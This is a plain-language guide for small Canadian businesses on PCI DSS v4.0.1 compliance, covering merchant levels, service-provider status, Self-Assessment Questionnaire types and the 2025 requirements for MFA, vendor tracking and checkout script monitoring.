If your business takes card payments, PCI DSS already applies to you, even if you process a single transaction a year. The hard part isn't the security itself, it's working out which slice of the standard you actually have to meet, and not over-buying to get there.
This is a plain-language guide for a small Canadian merchant or service provider: what PCI is, where your business fits, how you prove it, and what changed in the latest version. It's a general overview, not legal or assessor advice; for your exact obligations, confirm with your payment processor or a qualified assessor.
PCI is a contract, not a law
PCI DSS (the Payment Card Industry Data Security Standard) is set by the major card brands, Visa, Mastercard, American Express, Discover, and JCB, not by any government. There is no PCI inspector who shows up at your door. The standard is enforced through your merchant agreement by your payment processor, also called your acquirer. That makes non-compliance a contractual and financial problem, not a regulatory one: monthly non-compliance fees, higher transaction rates, and, if you suffer a breach, liability for fraud losses and forensic costs.
The current version is v4.0.1. It became the only active version when the transition from the previous edition closed in early 2025, so any assessment you do now is against v4.0.1. Because it is card-brand global rather than Canadian, it applies to any business in Canada that accepts cards, separate from privacy rules like PIPEDA.
The four levels: where a small business fits
PCI sorts every merchant into one of four levels based on yearly card transaction volume, and the level decides how much you have to do to validate:
- Level 1: more than 6 million transactions a year. Requires an annual on-site audit by a Qualified Security Assessor.
- Level 2: 1 to 6 million transactions a year.
- Level 3: 20,000 to 1 million e-commerce transactions a year.
- Level 4: fewer than 20,000 e-commerce transactions, or up to 1 million total transactions a year.
Almost every small business lands in Level 4, the lightest tier, where you assess yourself instead of hiring an outside auditor. One thing to keep in mind: a breach can push you up to a stricter level, so staying compliant at Level 4 is what keeps your obligations small.
Merchant or service provider? You might be both
This is a distinction many owners miss. A merchant sells goods or services and accepts cards. A service provider is a business that stores, processes, or transmits other companies' cardholder data, or could otherwise affect the security of someone else's card payments. Think of a payment gateway, a host that runs a client's checkout, or a SaaS platform that handles billing on behalf of its customers.
If other businesses' customers' card data flows through your systems, you are a service provider and carry your own PCI obligations, on top of any you have as a merchant. A lot of small SaaS founders don't realize they have crossed that line until a customer's security questionnaire asks for their PCI status. If you build software that touches payments, assume the question is coming and find out where you stand before it does.
How you actually prove it: the SAQ
For a Level 4 business, "doing PCI" usually means completing a Self-Assessment Questionnaire (SAQ) once a year, and, for anything internet-facing, running a quarterly network scan through an Approved Scanning Vendor. There are several SAQ types, and which one you file depends entirely on how you take payments:
- SAQ A: e-commerce or phone and mail order where you have fully outsourced payments to a compliant provider, for example a hosted Stripe or Shopify checkout. This is the shortest questionnaire.
- SAQ A-EP: e-commerce where your own site shapes the payment page but never stores card data.
- SAQ B-IP: standalone, internet-connected card terminals.
- SAQ C-VT: a virtual terminal you key payments into one at a time.
- SAQ P2PE: a validated point-to-point encryption terminal.
The single biggest lever is keeping card data out of your own systems: outsource the actual handling to a compliant processor and you qualify for the shortest SAQ with the fewest controls to prove. Your processor will tell you exactly which SAQ you are required to file, so ask them rather than guessing.
What changed in version 4.0.1, and what bites small shops
Most of v4.0.1's new requirements became mandatory on March 31, 2025. Three of them matter most for a small business:
- Multi-factor authentication on everything that touches card data. MFA used to be required only for administrators and remote access. Now it is required for all access into the cardholder data environment, including ordinary staff accounts.
- You are accountable for your vendors. Compliance is no longer just about your own systems. You have to track that your point-of-sale vendor, gateway, and hosting provider are themselves PCI compliant.
- Script controls for online checkouts. If you run an e-commerce payment page, you now have to manage and monitor the scripts that load on it, the control aimed at catching digital skimming attacks that steal card numbers straight from the browser.
None of these are exotic. MFA and a current vendor list are things a well-run small business should have anyway, which is the encouraging part of the next section.
The good news: you probably have most of it already
PCI reads as intimidating, but for a typical small merchant the controls are mostly already sitting in the tools you use. Modern platforms like Square, Shopify, Stripe, and Moneris build in encryption, tokenization, and MFA, and they shoulder the heaviest parts of the standard so you don't store raw card numbers at all. For most small businesses, PCI is less about buying security products and more about choosing compliant providers, keeping card data off your own laptops and spreadsheets, and writing down what you do.
The trap is the opposite of overspending: handling card data manually where you don't have to, a card number jotted on a notepad, emailed, or stored in a CRM field, which drags more of your systems into scope and makes every part of compliance harder.